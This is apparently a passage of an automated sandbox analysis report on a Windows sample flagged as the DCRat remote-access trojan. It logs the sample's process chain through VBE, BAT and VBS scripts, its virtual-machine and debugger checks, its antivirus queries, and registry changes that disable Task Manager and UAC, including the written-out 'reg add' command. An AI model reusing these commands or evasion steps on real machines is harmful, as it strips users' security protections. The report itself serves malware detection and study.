            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0034A5F4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0035B8E0
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036AAA8 FindFirstFileExA,0_2_0036AAA8
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035DD72 VirtualQuery,GetSystemInfo,0_2_0035DD72
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599878Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599875
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599765
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599891
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599890
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599797
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\userJump to behavior
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001C02D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
            Source: wscript.exe, 00000002.00000003.1431982960.0000000002FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001C087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BD2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsetup.exe,0
            Source: wscript.exe, 00000002.00000003.1431982960.0000000002FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2194422179.000000001C143000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2517444827.000000001C57D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2517444827.000000001C57D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}fz
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001BFC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SurrogateContainerAgent.exe, 00000005.00000002.1510343188.000000001C676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: w32tm.exe, 00000012.00000002.1527996968.000001EA4AC38000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1702926694.000000001BA30000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2370001609.000000001BDCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeAPI call chain: ExitProcess graph end nodegraph_0-24596
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036866F
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036753D mov eax, dword ptr fs:[00000030h]0_2_0036753D
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036B710 GetProcessHeap,0_2_0036B710
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035F063 SetUnhandledExceptionFilter,0_2_0035F063
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0035F22B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036866F
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0035EF05
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035ED5B cpuid 0_2_0035ED5B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0035A63C
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\portcontainerRef\SurrogateContainerAgent.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0035D5D4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034ACF5 GetVersionExW,0_2_0034ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disable Task Manager(disabletaskmgr)
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1
            Disable UAC(promptonsecuredesktop)
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
            Disables UAC (registry)
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Disables the Windows task manager (taskmgr)
            Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1702926694.000000001BA30000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BC70000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2366644670.000000001BD16000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2284259952.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SurrogateContainerAgent.exe PID: 7676, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 7108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 2156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 1868, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3592, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
